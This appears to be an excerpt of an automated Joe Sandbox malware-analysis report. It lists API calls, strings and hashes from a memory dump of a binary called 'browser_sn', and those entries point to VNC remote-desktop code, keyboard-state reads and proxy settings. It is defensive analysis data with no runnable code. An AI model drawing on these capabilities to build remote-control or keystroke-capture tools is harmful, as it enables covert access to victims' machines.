                                                      • Instruction ID: c2fd8f8923210c590743fe840a8b60a5dd8921aa100af33d769aa1706ded7bfd
                                                      • Opcode Fuzzy Hash: 1f8284c9b81bc00274cff331346e792dc04ed1df2d7324caccb88a26b9367104
                                                      • Instruction Fuzzy Hash: 0EF0FC21B38E8282E370AB3A69406B5E595EF85BE4F985231FF5943FD9DF3CE4414610
                                                      APIs
                                                      • GetKeyboardState.USER32 ref: 00007FF790C531D3
                                                        • Part of subcall function 00007FF790C474C0: GetKeyState.USER32 ref: 00007FF790C47509
                                                        • Part of subcall function 00007FF790C474C0: GetKeyState.USER32 ref: 00007FF790C47523
                                                        • Part of subcall function 00007FF790C474C0: GetKeyState.USER32 ref: 00007FF790C4753D
                                                        • Part of subcall function 00007FF790C474C0: GetKeyState.USER32 ref: 00007FF790C47557
                                                        • Part of subcall function 00007FF790C474C0: GetKeyState.USER32 ref: 00007FF790C47571
                                                        • Part of subcall function 00007FF790C474C0: GetKeyState.USER32 ref: 00007FF790C4758B
                                                        • Part of subcall function 00007FF790C474C0: TryEnterCriticalSection.KERNEL32 ref: 00007FF790C475D6
                                                        • Part of subcall function 00007FF790C474C0: LeaveCriticalSection.KERNEL32 ref: 00007FF790C4760F
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: State$CriticalSection$EnterKeyboardLeave
                                                      • String ID:
                                                      • API String ID: 4104749118-0
                                                      • Opcode ID: 0256701cad5363ec1328f5542e36a1f7f43bbe659b594c5479dffbbec42ae8d9
                                                      • Instruction ID: 1e0a14d3f1543a3efc9f2665f9a3df53701ac0b53870e6cc1614d8f96ca75c31
                                                      • Opcode Fuzzy Hash: 0256701cad5363ec1328f5542e36a1f7f43bbe659b594c5479dffbbec42ae8d9
                                                      • Instruction Fuzzy Hash: A6F0E971A3C58041E234A732E8213F6F2A1FF8C744F844235998D056A5CF2CF558DA10
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Object$Select$Delete$CompatibleCreateIconMetricsSystem$CursorDrawFlushInfoRect
                                                      • String ID: F
                                                      • API String ID: 2202639625-1304234792
                                                      • Opcode ID: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
                                                      • Instruction ID: d7da9c201f36ef401f52af5a3748648a93e23cb0e4a9df6b860f82f9bf3262e0
                                                      • Opcode Fuzzy Hash: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
                                                      • Instruction Fuzzy Hash: 51C13A36A14A968AE7A0DF75D6489AEB3BDFF49744F810436EE0943714DF78E844CB20
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Delete$CloseHandleObject$CriticalEventSectionThreadfree$FreeLibraryMessagePostReleaseSingleSleepTerminateWait
                                                      • String ID: 2$vncdesktop.cpp : Desktop thread running, force close $vncdesktop.cpp : delete ((RGBPixelList) $vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : ~vncDesktop $vncdesktop.cpp : ~vncDesktop Shutdown()$vncdesktop.cpp : ~vncDesktop m_lGridsList.clear$vncdesktop.cpp : ~vncDesktop:: second request to close InitWindowthread
                                                      • API String ID: 2560957196-1231019345
                                                      • Opcode ID: 7b40948f3f8d59fae7a34cd2d6a5b2514468978ae6bf0d8a194a99cecfe53d32
                                                      • Instruction ID: 473a8212815393e3ba2e4deebf53220438f9f03d69c38c0e9d4629f216fcaaf1
                                                      • Opcode Fuzzy Hash: 7b40948f3f8d59fae7a34cd2d6a5b2514468978ae6bf0d8a194a99cecfe53d32
                                                      • Instruction Fuzzy Hash: EDB16A26A28A8285EB34EF75D8441F9A764FF82B84F845032DA0E577A5CF3CF545E360
                                                      APIs
                                                      • LoadLibraryW.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDCE1
                                                      • GetProcAddress.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDCFD
                                                      • EncodePointer.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDD0F
                                                      • GetProcAddress.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDD26
                                                      • EncodePointer.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDD2F
                                                      • GetProcAddress.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDD46
                                                      • EncodePointer.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDD4F
                                                      • GetProcAddress.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDD66
                                                      • EncodePointer.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDD6F
                                                      • GetProcAddress.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDD8E
                                                      • EncodePointer.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDD97
                                                      • DecodePointer.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDDCA
                                                      • DecodePointer.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDDDA
                                                      • DecodePointer.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDE30
                                                      • DecodePointer.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDE51
                                                      • DecodePointer.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDE6B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                                                      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                      • API String ID: 2643518689-564504941
                                                      • Opcode ID: 3f01601e3236801bc7f61e640a5cdc001557def2435a7818b715a9f11b20129c
                                                      • Instruction ID: c95777df4f1fcbb516f4f626ea0edddaedf3f27f2906de93e282e08681bf3d1e
                                                      • Opcode Fuzzy Hash: 3f01601e3236801bc7f61e640a5cdc001557def2435a7818b715a9f11b20129c
                                                      • Instruction Fuzzy Hash: 5D51DB20E3AB0385E975BB36A8695B4E2B1BF56B95FC42039DD0E47790EE3CF4458221
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteObjectfree$CombineCreateOffsetRect
                                                      • String ID:
                                                      • API String ID: 960235054-0
                                                      • Opcode ID: ac153f7d938eb301090265389bc7675e5ea949dc37f539b25424fdb8fde9d8de
                                                      • Instruction ID: e253994c791bca21a7ef00aa90fee36356edc4caf3414a3b49ef91be5cf73838
                                                      • Opcode Fuzzy Hash: ac153f7d938eb301090265389bc7675e5ea949dc37f539b25424fdb8fde9d8de
                                                      • Instruction Fuzzy Hash: F5911B36B24A4296EB20EB72E4546ADB371FB89B88F808031DE4E57B65DF38F505C710
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wgetenv$freeinet_ntoa$ErrorFreeHeapLast_errnomalloc
                                                      • String ID: HTTP_PROXY$SOCKS4_RESOLVE$SOCKS4_SERVER$SOCKS5_RESOLVE$SOCKS5_SERVER$SOCKS_RESOLVE$SOCKS_SERVER$http://
                                                      • API String ID: 3609861302-2295524587
                                                      • Opcode ID: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
                                                      • Instruction ID: 027a99afed50efb98e013f3181f1347dcd15812cae2197cd8b8c4c191f8c3b14
                                                      • Opcode Fuzzy Hash: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
                                                      • Instruction Fuzzy Hash: B5A17221A3968245EEB9FB3594512F9E2A1EF56784FC80435EB0D477E6EE2CF941C320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno_invalid_parameter_noinfo_wsopen_s
                                                      • String ID: $ $ $ $ $=$UNICODE$UTF-16LE$UTF-8$a$ccs$r$w
                                                      • API String ID: 2053332431-1561892669
                                                      • Opcode ID: 35e5734d2bed330ea71c417f92d73fedc9b5434ee0112678046c42af1f03098b
                                                      • Instruction ID: d3bc0f2d62fdbee70ca6b9b4ac12a67b7bd165b0e936d4aa66dcbff4cf996c7c
                                                      • Opcode Fuzzy Hash: 35e5734d2bed330ea71c417f92d73fedc9b5434ee0112678046c42af1f03098b
                                                      • Instruction Fuzzy Hash: 8071AEA3E2C2034AFB756A35AA3A3B99AD06F53754FD84031DB0D267C5DE2CF5484622
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Item$MessageSend$_snprintf$InfoScrollText
                                                      • String ID: <%s>: $MS Sans Serif
                                                      • API String ID: 1140286628-959951747
                                                      • Opcode ID: c7a658c0cd68b9c919c6da95f173c1f64cd529a423dcd2b2ccdca4d864df1cc5
                                                      • Instruction ID: 02b58d3be508284a0d72f3ebbb6605869c4f22bcc19c654e65f392afa403b212
                                                      • Opcode Fuzzy Hash: c7a658c0cd68b9c919c6da95f173c1f64cd529a423dcd2b2ccdca4d864df1cc5
                                                      • Instruction Fuzzy Hash: E9918EA2B24A4196E724EF75E8006A9B3B1FF98B98F905135DE4D17B68CF3CE585C310
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 2315031519-0
                                                      • Opcode ID: 2cd480b998b965cc6955ada75f3ee5f47b1b2dcf7e54efe20603cb8eba4e3483
                                                      • Instruction ID: d7ecd070a23ad63def5e7292e3e16f469d55825e851d54394986e05c4f10640e
                                                      • Opcode Fuzzy Hash: 2cd480b998b965cc6955ada75f3ee5f47b1b2dcf7e54efe20603cb8eba4e3483
                                                      • Instruction Fuzzy Hash: EFB13B329286528AE724AF35E4621AAF7A0FF85750F904136E78D42B94DF7CF451CB21
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Desktop$Thread$CloseCurrentErrorInformationInputLastObjectOpenUser
                                                      • String ID: vncservice.cpp : !GetUserObjectInformation(inputdesktop$vncservice.cpp : !GetUserObjectInformation(threaddesktop$vncservice.cpp : OpenInputDesktop %i I$vncservice.cpp : OpenInputDesktop II$vncservice.cpp : failed to close input desktop$vncservice.cpp : threadname, inputname differ
                                                      • API String ID: 55935355-432259686
                                                      • Opcode ID: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
                                                      • Instruction ID: f27e8a7dfe464a064c0bafab9f08b11f7d1f24af61d729c0d3231f68d3ccac36
                                                      • Opcode Fuzzy Hash: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
                                                      • Instruction Fuzzy Hash: 58516C69A38A8381EB34FB75A8851F5A3B4FF95744FC05032D95E827A4EE3CF145C6A0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Thread$Object$CloseCreateCurrentDesktopEventHandleInformationResetSingleTerminateUserWait
                                                      • String ID: Default$vncdesktopsink.cpp : ERROR: initwindowthread failed to start $vncdesktopsink.cpp : StartInitWindowthread $vncdesktopsink.cpp : StartInitWindowthread default desk$vncdesktopsink.cpp : StartInitWindowthread no default desk$vncdesktopsink.cpp : StartInitWindowthread reactivate$vncdesktopsink.cpp : StartInitWindowthread started
                                                      • API String ID: 3943905059-2958163836
                                                      • Opcode ID: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
                                                      • Instruction ID: 8c68675b7f2cdd90795b74e47a627c9d8453f8dba86320352e29b06b91cf1160
                                                      • Opcode Fuzzy Hash: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
                                                      • Instruction Fuzzy Hash: 61413A65A28A8786E734AB30E8442FAE765FF85744FC41032D94D4A3A8DF3CF146C760
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Global$Lock$AllocFreemalloc
                                                      • String ID: Unable to allocate memory in zip dll
                                                      • API String ID: 105282483-1808592719
                                                      • Opcode ID: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
